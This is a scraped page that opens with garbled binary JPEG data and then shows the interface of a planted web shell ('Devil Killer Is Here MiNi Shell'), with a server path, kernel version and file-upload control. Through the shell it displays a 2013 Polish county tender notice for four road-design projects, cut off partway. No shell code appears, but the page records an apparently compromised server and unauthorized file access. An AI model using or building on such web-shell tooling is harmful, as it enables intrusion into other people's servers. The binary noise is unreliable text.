JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130731/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130731/306122-N-2013.html

<p class="kh_header"><b>Białystok: Opracowanie czterech drogowych dokumentacji projektowych.</b><br>
<b>Numer ogłoszenia: 306122 - 2013; data zamieszczenia: 31.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg w Białymstoku , Zaścianki, Szosa Baranowicka 37, 15-522 Białystok, woj. podlaskie, tel. (085) 740-21-49, 740-22-17, faks (085) 740-22-19.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzd.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie czterech drogowych dokumentacji projektowych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie czterech dokumentacji projektowych na:
Zadanie I - Budowę chodnika w miejscowości Iwanówka w ciągu drogi powiatowej Nr 1504 B wraz z budową zjazdów (gm. Turośń Kościelna)
Zadanie II - Przebudowę z rozbudową drogi powiatowej Nr 1428B w m. Studzianki, gmina Wasilków
Zadanie III -  Przebudowę drogi powiatowej Nr 1393 B na odcinku ul. Wasilkowskiej w Jurowcach (gm. Wasilków) 
Zadanie IV -  Przebudowę drogi powiatowej Nr 2346 B - ulicy Nilskiego - Łapińskiego w Łapach.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wpłaty wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się doświadczeniem, w wykonaniu (zakończeniu) w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej: 
Dla zadania I, III i IV  -  2 dokumentacji projektowych odpowiadających swoim rodzajem przedmio-towi zamówienia (tj. każda dokumentacja dotycząca projektu drogi lub ulicy  o  długości min. 500,00 m ) dla których uzyskano pozwolenie na budowę 
Dla zadania II  -  2 dokumentacji projektowych odpowiadających swoim rodzajem przedmiotowi za-mówienia ( tj. każda dokumentacja dotycząca projektu ulicy o  długości min. 500,00 m wraz z kanalizacją deszczową ) dla których uzyskano pozwolenie na budowę</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje lub będzie dysponował osobami, które będą uczestniczyć w wykonywaniu zamówienia, legitymującymi się kwalifikacjami zawodowymi, doświadczeniem i wykształceniem odpowiednimi do funkcji, jakie zostaną im powierzone. Wykonawca  przedstawi wraz z ofertą osoby,  które spełniają następujące wymagania:
1 min.  jedna osoba proponowana do pełnienia funkcji projektanta posiadająca minimalne kwalifikacje zawodowe, doświadczenie i wykształcenie :
-  projektant powinien posiadać  uprawnienia  projektowe w specjalności drogi  bez  ograniczeń lub im  równoważne,
-  projektant powinien zrealizować w okresie ostatnich 3 lat przed upływem terminu    składania ofert min.
 Dla zadania I , III i IV -  2 dokumentacji projektowych odpowiadających swoim rodzajem przedmiotowi zamówienia (tj. każda dokumentacja dotycząca projektu drogi lub ulicy o  długości min. 500,00 m ) dla których uzyskano pozwolenie na budowę 
Dla zadania II  -  2 dokumentacji projektowych odpowiadających swoim rodzajem            przedmiotowi zamówienia ( tj. każda dokumentacja dotycząca projektu ulicy o  długości min. 500,00 m wraz z kanalizacją deszczową ) dla których uzyskano pozwolenie na budowę 
 -     powinien należeć do Okręgowej Izby Inżynierów Budownictwa.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>w wykazie wskazać usługi na potwierdzenie spelnienia warunku doświadczenia;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pzd.bialystok.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie zamawiającego, pokój nr 17 lub za pośrednictwem poczty lub na w/p stronie internetowej..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.08.2013 godzina 09:50, miejsce: Siedziba Zamawiającego pokój nr 9..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opracowannie dokumentacji projektowej na: Budowę chodnika w miejscowości Iwanówka w ciągu drogi powiatowej Nr 1504 B wraz z budową zjazdów (gm. Turośń Kościelna).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Stan istniejący - dane ewidencyjne
Droga powiatowa Nr 1504 B o długości ok. 400 m, szerokość jezdni ograniczonej krawężnikiem - 6,0m, chodniki gruntowe.

2.	Dane wyjściowe do projektowania

Opracować projekt budowy chodnika i zjazdów gospodarczych/na drogi boczne.
Przewidzieć wymianę istniejącego krawężnika na nowy.
Nie przewiduje się przebudowy urządzeń obcych zlokalizowanych w pasie drogowym. W przypadku stwierdzenia kolizji należy powiadomić Zamawiającego, który podejmie decyzję o zleceniu  dodatkowego opracowania branżowego.
 
3.      ZAKRES OPRACOWANIA

3.1. Opracować wszystkie niezbędne materiały do uzyskania decyzji pozwolenie na budowę. Tryb uzyskania pozwolenia na budowę zostanie określony po opracowaniu aktualnej mapy do celów projektowych.  

Prawidłowe wykonanie mapy obejmuje następujące czynności:
-  	porównanie istniejącej mapy z terenem i naniesienie na nią istniejących i projektowanych elementów infrastruktury technicznej oraz obiektów inżynierskich w tym rowów przydrożnych, krawężników, płotów itp.
- 		obliczenie współrzędnych punktów granicznych do wkartowania na mapę pasa drogowego
-  	wykonanie pomiarów aktualizacyjnych (sytuacyjno - wysokościowych)
-  	opracowanie mapy sytuacyjno - wysokościowej w skali 1:500
- 	rejestracja opracowania w Powiatowym Ośrodku Dokumentacji Geodezyjno - Kartograficznej w Bia-łymstoku.
       Dokumentację należy przekazać:
 
            a. Materiały do opiniowania ze specustawy drogowej wraz z projektem podziału  
                działek    - 7 egz. lub materiały do wniosku o ustalenie lokalizacji inwestycji celu publicznego -  
                4 egz. 
            b. mapa do celów projektowych w skali 1:500                                                 - 1 egz.
c. Projekt budowlany                                                                                       - 4 egz.
      d. Projekt wykonawczy (techniczny) branża drogowa 
          z częścią kosztorysową i ST                                                                       - 4 egz. 
 
             Obowiązuje wersja elektroniczna całej dokumentacji projektowej  - 1 płyta

Pozostałe Wymagania w stosunku do dokumentacji projektowej podano w Rozdziale nr 6.
 
Obowiązuje przedstawienie do dnia 20.09.2013r. koncepcji w wersji elektronicznej   zawierającej rozwiązania sytuacyjne i wysokościowe, do której Zamawiający ustosunkuje się w ciągu trzech dni roboczych.
 
3.2. Terminy przekazania Zamawiającemu elementów zamówienia zostały określone w formularzu cenowym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Na opracowanie dokumentacji projektowej na : Przebudowę z rozbudową drogi powiatowej Nr 1428B w m. Studzianki, gmina Wasilków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Stan istniejący
1.1.	Szerokość istniejącej jezdni i korona
Odcinek podlegający opracowaniu od km rob. 0+000 do km rob. ok. 2+380. Szer. jezdni 5,5m, 6,0m. Droga o nawierzchni bitumicznej.
 1.2.	Rodzaj i stan istniejącej jezdni wykorzystywanej jako podbudowa
Istniejącej jezdni nie należy wykorzystywać jako podbudowy. Stan techniczny jezdni - krytyczny
1.3.	Sytuacja trasy
 Nie wymaga zasadniczych korekt.

1.4.	Obiekty inżynierskie
Przepusty:
-	 5  przepustów  żelbetowych na ciekach
-	1 przepust żelbetowy drogowy

1.5.	Niweleta drogi
Niweleta drogi nie wymaga zasadniczych korekt

1.6.	Stan rowów i innych urządzeń odwadniających
       Odwodnienie drogi wymaga:
przebudowy wszystkich przepustów  z ewentualnym przykryciem rowów odprowadzających w obrębie zagospodarowanych posesji,
renowacji rowów


2.	DANE WYJŚCIOWE DO PROJEKTOWANIA

2.1.	Parametry techniczne do projektowania:
2.1.1. Prędkość projektowa Vp   -  40 lub 30 kmh - teren zabudowany
2.1.2. Kategoria drogi                  -   L
2.1.3. Przekrój poprzeczny (normalny):
-	Uliczny, półuliczny, szlakowy (w zależności od charakteru zabudowy) szer. jezdni 6,0m. 

2.2.	  Konstrukcja (technologia) nawierzchni: zgodnie z rozporządzeniem MTiGM z dnia 
                                               02.03.1999r.w sprawie warunków technicznych jakim powinny odpowiadać drogi publiczne i ich usytuowanie, Dz.U. Nr 43 z dnia 14.05.1999r.

2.2.1.	Kategoria ruchu -  KR2
2.2.2	Podbudowa: pomocnicza - kruszywo łamane stabilizowane mechanicznie, 
2.2.3	Nawierzchnia - beton asfaltowy 

2.3.	Propozycje dotyczące odwodnienia i bezpieczeństwa ruchu
Rozwiązanie skrzyżowań z drogami gminnymi.  Zatoki autobusowe, przebudowa istniejących pętli autobusowych.
Odcinkowa kanalizacja deszczowa z wyprowadzeniem do istniejących przepustów.   Przebudowa wszystkich przepustów  z ew. dostosowaniem do odbioru wód opadowych.
  
2.4.   Propozycje dotyczące zadrzewienia
Przewidzieć do wycinki wszystkie drzewa zagrażające bezpieczeństwu ruchu i uniemożliwiające wykonanie przebudowy drogi.
Drzewa przewidziane do wycinki należy ponumerować na mapie syt-wys.
Przewidzieć do wycinki zbędne zakrzaczenie.

2.5.	Propozycje przebudowy (zabezpieczenia) urządzeń towarzyszących
Nie przewiduje się przebudowy uzbrojenia terenu. W przypadku stwierdzenia kolizji, w porozumieniu z Zamawiającym ustalić zakres przełożenia urządzeń obcych oraz formę zapłaty za opracowanie branżowe.

3.    ZAKRES OPRACOWANIA

3.1. Opracować wszystkie niezbędne materiały do uzyskania decyzji o zezwoleniu na realizację inwestycji drogowej. Projekt wykonać na aktualnej mapie zasadniczej.  
Prawidłowe wykonanie mapy obejmuje następujące czynności:
-  	porównanie istniejącej mapy z terenem i naniesienie na nią istniejących i projektowanych elementów infrastruktury technicznej oraz obiektów inżynierskich w tym rowów przydrożnych, krawężników, płotów itp.
- 		obliczenie współrzędnych punktów granicznych do wkartowania na mapę pasa drogowego
-  	wykonanie pomiarów aktualizacyjnych (sytuacyjno - wysokościowych)
-  	opracowanie mapy sytuacyjno - wysokościowej w skali 1:500
- 	rejestracja opracowania w Powiatowym Ośrodku Dokumentacji Geodezyjno - Kartograficznej w Białymstoku.
        
 3.2. Dodatkowo należy opracować:
       -     operaty wodnoprawne 
       -     badania geotechniczne podłoża nawierzchni
-	projekt stałej organizacji ruchu

Dokumentację należy przekazać:
 
            a. Materiały do opiniowania ze specustawy drogowej wraz z projektem podziału działek             - 7 egz.
            b. mapa do celów projektowych w skali 1:500    - 1 egz.
c. Projekt budowlany             - 4 egz.
d. Projekt wykonawczy (techniczny) branża drogowa z częścią kosztorysową i ST     - 4 egz. 
e.  Projekt wykonawczy (techniczny) obiekty inżynierskie z częścią kosztorysową i ST   - 4 egz.
f.  Projekt wykonawczy (techniczny) branża sanitarna (odcinkowa kanalizacja deszczowa) z częścią kosztorysową i ST             - 4 egz.
g. Operaty wodnoprawne (odcinkowa kanalizacja deszczowa  i przepusty) wersja papierowa - po 3egz. + wersja elektroniczna - po 2 płytki
 h. Badania geotechniczne podłoża nawierzchni     - 2 egz. 
i. Plan wyrębu drzew i krzewów         - 3 egz
j. Projekt stałej organizacji ruchu        - 4 egz.    

 Obowiązuje wersja elektroniczna całej dokumentacji projektowej  - 1 płyta

Pozostałe Wymagania w stosunku do dokumentacji projektowej podano w Rozdziale nr 6.

 
Obowiązuje przedstawienie do dnia 20.09.2013r. koncepcji w wersji elektronicznej   zawierającej rozwiązania sytuacyjne i wysokościowe, do której Zamawiający ustosunkuje się w ciągu trzech dni roboczych.

 3.3. Terminy przekazania Zamawiającemu elementów zamówienia zostały określone w formularzu cenowym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Opracowanie dokumentacji projektowej na: Przebudowę drogi powiatowej Nr 1393 B na odcinku ul. Wasilkowskiej w Jurowcach (gm. Wasilków).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Stan istniejący
1.1.	Szerokość istniejącej jezdni i korona
Km rob. 0+000 do km rob. ok. 0+900- przekrój półuliczny i szlakowy, jezdnia o nawierzchni bitumicznej szer. 6,00m, szer. korony 8,0m

1.2.	Rodzaj i stan istniejącej jezdni wykorzystywanej jako podbudowa
       Nawierzchnia bitumiczna, stan zły

1.3.	Obiekty inżynierskie
Przepust na cieku - nie przewiduje się przebudowy 

1.4.	Niweleta drogi
Niweleta drogi wymaga drobnych korekt  z uwagi na deformacje podłużne i poprzeczne nawierzchni. 

1.5.	Stan rowów i innych urządzeń odwadniających
Rowy wymagają renowacji lub odtworzenia

1.6.	Urządzenia obce
- linia energetyczna
- kabel telefoniczny
- kanalizacja sanitarna
- wodociąg

2.	DANE WYJŚCIOWE DO PROJEKTOWANIA

2.1.	Wnioskowany charakter robót: przebudowa 

2.2.	Parametry techniczne do projektowania:
2.2.1. Prędkość projektowa Vp   -   30 lub 40 km/h  - teren zabudowany
2.2.2. Kategoria drogi                  -   L
2.2.3. Przekrój poprzeczny (normalny):
-	półuliczny i szlakowy zgodnie ze stanem istniejącym, szer. jezdni 6,0m, pobocza gruntowe, szer. korony drogi 8,0 lub 8,5m.    


2.3.	  Konstrukcja (technologia) nawierzchni: zgodnie z rozporządzeniem MTiGM z dnia 
                                               02.03.1999r.w sprawie warunków technicznych jakim powinny 
                                               odpowiadać drogi publiczne i ich usytuowanie, Dz.U. Nr 43 z dnia 
                                               14.05.1999r.

2.3.1.	Kategoria ruchu - KR3 
2.3.2	Podbudowa - nowa
2.3.3.	Nawierzchnia - beton asfaltowy  
 
2.4.	Propozycje dotyczące odwodnienia i bezpieczeństwa ruchu
Renowacja rowów wg potrzeb.  
 
2.5.	Propozycje przebudowy (zabezpieczenia) urządzeń towarzyszących
Nie przewiduje się przebudowy uzbrojenia terenu.  

3.    ZAKRES OPRACOWANIA
3.1. Opracować projekt wykonawczy przebudowy nawierzchni jezdni drogi.  Opracowanie wykonać na  mapie zasadniczej w skali 1:500. Wersja elektroniczna mapy zasadniczej dostępna w Powiatowym Ośrodku Dokumentacji Geodezyjnej i Kartograficznej w Białymstoku, Białystok ul. Mickiewicza 3

  3.2.  Dokumentację należy przekazać:
 
 
a. Projekt wykonawczy(techniczny) z częścią przedmiarową  i ST	     w  5 egz.   wersja papierowa + wersja elektroniczna - 1 płyta
 
 
Pozostałe Wymagania w stosunku do dokumentacji projektowej podano w Rozdziale nr 6.
   

3.3. Termin realizacji zamówienia: 30.08.2013r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Opracowanie dokumentacji projektowej na: Przebudowę drogi powiatowej Nr 2346 B - ulicy Nilskiego - Łapińskiego w Łapach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Stan istniejący

1.1	Szerokość istniejącej jezdni i korona wg danych ewidencyjnych
odcinek od km rob. 0+000 do km rob. ok. 0+ 200 (skrzyżowanie ulic Granicznej, Wodociagowej i Pięknej  do przejazdu kolejowego)  
-    przekrój uliczny  
-	jezdnia o nawierzchni bitumicznej szer. 7,0m wykonana na podbudowie betonowej  -     chodniki o na-wierzchni z płytek betonowych i kostki betonowej typu  polbruk
1.2	Niweleta ulicy
Niweleta ulicy wymaga niewielkich korekt z uwagi na deformacje podłużne i poprzeczne nawierzchni. 

1.3	Dane ewidencyjne i stan techniczny dotyczące obiektów inżynierskich i uzbrojenia
Brak obiektów inżynierskich
